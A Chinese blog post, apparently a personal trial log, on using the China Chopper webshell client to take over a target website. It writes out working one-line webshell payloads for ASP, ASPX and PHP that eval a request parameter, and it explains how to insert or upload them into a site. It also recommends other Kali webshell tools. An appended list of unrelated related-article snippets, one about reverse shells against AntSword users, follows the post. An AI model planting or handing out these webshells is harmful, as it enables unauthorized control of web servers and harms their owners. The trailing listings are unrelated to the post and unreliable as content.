一. 简介:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。

传说中的官方网站:http://maicaidao.co/   。下载的时候发现是2014年的版本。。。

测试完官方的中国菜刀后,从Cracer的Cracer安全工具包v7版中拿了一个相对较新的,但是发现百度上找到的菜刀都有后门,并且中国菜刀的这些一句话木马很容易就被杀毒软件查杀了,所以推荐两款更好的kali下的工具:webacoo、Weevely 。

二. 记录:

asp的一句话是: <%eval request ("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是: <?php @eval($_POST['pass']);?>

我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

使用起来非常简单,如下图:

2018-11 中国菜刀小试记录(windows环境)相关推荐

  1. windows环境下Eclipse开发MapReduce程序遇到的四个问题及解决办法

    按此文章<Hadoop集群(第7期)_Eclipse开发环境设置>进行MapReduce开发环境搭建的过程中遇到一些问题,饶了一些弯路,解决办法记录在此: 文档目的: 记录windows环 ...

  2. 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

    中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...

  3. QIIME 2用户文档. 10元数据Metadata(2018.11)

    文章目录 前情提要 QIIME 2用户文档. 9元数据 元数据格式要求 元数据验证 前导和尾随空格字符 注释和空行 标识符列 标识符的建议 元数据列 列类型 数字格式化 高级文件格式详细信息 TSV方 ...

  4. 2018.11:大数据在政府统计中的应用、瓶颈及融合路径(余芳东)

    内容摘要:应用大数据是未来政府统计发展的必然趋势.本文系统梳理当前政府统计应用大数据的基本类型,研究探索大数据统计应用实践和基本方法思路,剖析大数据统计应用面临的困难和瓶颈,提出推进大数据与政府统计工 ...

  5. 简评黑客利器——中国菜刀

    来源:http://edu2b.sinaapp.com/?p=236&replytocom=17 作者:XXX 我是一个玩黑很多年的人,入侵了大大小小的服务器无数,体验着入侵快感的同时,自己的 ...

  6. Windows环境下32位汇编语言程序设计(典藏版)(含CD光盘1张)

    Windows环境下32位汇编语言程序设计(典藏版)(含CD光盘1张)(畅销10年,经典再现!) 罗云彬 著 ISBN 978-7-121-20759-4 2013年7月出版 定价:99.00元 75 ...

  7. 中国菜刀 及使用方法

    中国菜刀 及使用方法 [attach]268[/attach] Asp环境:<%eval request("a")%> Php环境:<?php @eval($_P ...

  8. 第一部分:使用iReport制作报表的详细过程(Windows环境下)

    第一部分:使用iReport制作报表的详细过程(Windows环境下) 提示:在有些板块,文中的图片看不到,建议到我的blog浏览文章:http://blog.csdn.net/jemlee2002/ ...

  9. 【区块链】研究报告:2018年中国区块链行业应用报告

    近日,中国区块链基础服务联盟发布<2018年中国区块链行业应用报告>,报告总结了区块链技术的前世今生和发展历程,描述了全国300多家区块链企业的总体发展情况,并对区块链应用场景进行了深入的 ...

最新文章

  1. R语言随机森林回归(randomforest)模型构建
  2. deepin--解决QQ时间与系统时间不一致
  3. Server error for SAP CRM_BUPA_ODATA
  4. Oracle入门(十一)之SQL
  5. 收件服务器信息,收件服务器配置信息
  6. 软考计算机网络初级试题答案,2015计算机软考网络管理员模拟试题练习及答案...
  7. Redis的内存回收机制和数据过期淘汰策略
  8. python导入模块的方式错误的是,导入模块时的错误处理
  9. 回调函数c++类中实现
  10. Docker概述 官方文档 Google翻译
  11. Echart使用,看了就会的
  12. 中控人脸指纹考勤机怎么如何偷偷修改数据记录
  13. safenet 超级狗 java调用 小计
  14. cocos creator 优量汇广告接入
  15. 开发模式和软件系统开发
  16. php框架 猪婆,猪婆塘_三湖文学社_新高淳论坛 - Powered by Discuz!
  17. 怎么将图片无损放大?手把手教你们这3种无损放大的方法
  18. 【图文详解】一文全面彻底搞懂HBase、LevelDB、RocksDB等NoSQL背后的存储原理:LSM-tree 日志结构合并树...
  19. 阻止点击冒泡的解决方法
  20. 使用python画K线图(蜡烛图)

热门文章

  1. 先成家后立业还是先立业后成家?
  2. 深入浅出Linux操作系统搭建JavaEE环境(五)
  3. java对象转换为JSON日期格式转换处理
  4. hbase协处理器Coprocessor(简介)
  5. 声网 SDK 接入以及音视频通话应用开发指南
  6. 设计模式:对问题行之有效的解决方式。其实它是一种思想。
  7. 拉钩参数加密过程:data
  8. Tuxera NTFS for Mac 2022新版本安装
  9. python英汉字典,Python基于有道实现英汉字典功能,python英汉字典
  10. 实时系统vxWorks - 虚拟机环境搭建(修复)